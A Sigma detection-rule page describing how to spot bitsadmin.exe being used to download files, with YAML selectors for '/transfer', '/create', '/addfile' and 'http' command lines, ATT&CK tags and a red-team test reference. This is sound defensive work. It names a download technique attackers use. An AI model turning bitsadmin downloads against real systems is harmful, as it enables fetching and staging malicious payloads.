Phoenix
Sigma IntelligenceBeta
Back to Rules
Detectionmediumtest

File Download Via Bitsadmin

Detects usage of bitsadmin downloading a file

Convert In Phoenix Studio

Open this Sigma rule in the converter with the YAML preloaded and ready for backend selection.

Launch
Michael Haag, FPT.EagleEyeCreated Thu Mar 09Updated Wed Feb 15d059842b-6b9d-4ed1-b5c3-5b89143c6edewindows
Log Source
WindowsProcess Creation
ProductWindows← raw: windows
CategoryProcess Creation← raw: process_creation

Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.

Detection Logic
Detection Logic4 selectors
detection:
    selection_img:
        - Image|endswith: '\bitsadmin.exe'
        - OriginalFileName: 'bitsadmin.exe'
    selection_cmd:
        CommandLine|contains: ' /transfer '
    selection_cli_1:
        CommandLine|contains:
            - ' /create '
            - ' /addfile '
    selection_cli_2:
        CommandLine|contains: 'http'
    condition: selection_img and (selection_cmd or all of selection_cli_*)
False Positives

Some legitimate apps use this, but limited.

References
1
Resolving title…
blog.netspi.com
2
Resolving title…
isc.sans.edu
3
Resolving title…
lolbas-project.github.io
Testing & Validation

Simulations

atomic-red-teamT1105
View on ART

Windows - BITSAdmin BITS Download

GUID: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b

Regression Tests

by Swachchhanda Shrawan Poudel (Nextron Systems)
Positive Detection Test1 matchevtx

Microsoft-Windows-Sysmon

EVTX JSON
MITRE ATT&CK
Rule Metadata
Rule ID
d059842b-6b9d-4ed1-b5c3-5b89143c6ede
Status
test
Level
medium
Type
Detection
Created
Thu Mar 09
Modified
Wed Feb 15
Author
Michael Haag, FPT.EagleEye
Path
rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml
Raw Tags
attack.defense-evasionattack.persistenceattack.t1197attack.s0190attack.t1036.003attack.command-and-controlattack.t1105
View on GitHub